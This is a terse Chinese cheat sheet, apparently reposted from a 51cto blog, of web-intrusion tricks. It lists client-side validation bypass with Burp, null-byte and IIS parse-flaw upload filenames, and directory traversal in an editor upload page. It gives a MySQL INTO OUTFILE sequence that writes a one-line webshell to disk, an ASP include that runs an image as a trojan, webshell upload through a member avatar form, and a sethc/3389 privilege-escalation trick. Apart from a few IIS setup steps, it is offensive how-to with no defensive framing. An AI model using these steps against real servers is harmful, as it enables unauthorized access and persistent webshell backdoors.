本地js验证突破
可用burp抓包,改后缀
可查看本地js文件,修改js代码
360提权:
360.exe 后加port 开启3389
360.exe sethc
00截断:xx.asp%00.jpg
解析漏洞:xx.asp;.jpg
admin/editor/admin_uploadfile.asp?id=&dir 列目录 ../返回上一级
可利用后台服务器端脚本代码,闭合和编辑方式插入一句话
数据库执行拿shell:
create table 表名(cmd text not null); 建表
insert into 表名 values('一句话×××'); 一句话存库
select cmd from 表名 into outfile("绝对路径");以文件形式输出
drop table if exists 表名 删除表
asp文件包含之后,当做asp脚本执行
<!--#include file="马子.jpg"-->
win03装网站:
添加删除角色->自定义->IIS->两个选项都勾上->下一步
配置
active server pages 服务开启
会员头像上传拿webshell
大马放进文件夹,压缩zip
抓图片包 删除图片数据 选择paste from file 选择zip马子
HTTP history 历史记录看上传路径
cmd执行不成功的情况下,找拥有可读可写权限的文件夹,上传cmd
执行时,也需要更换大马cmd路径
转载于:https://blog.51cto.com/3945465/2147134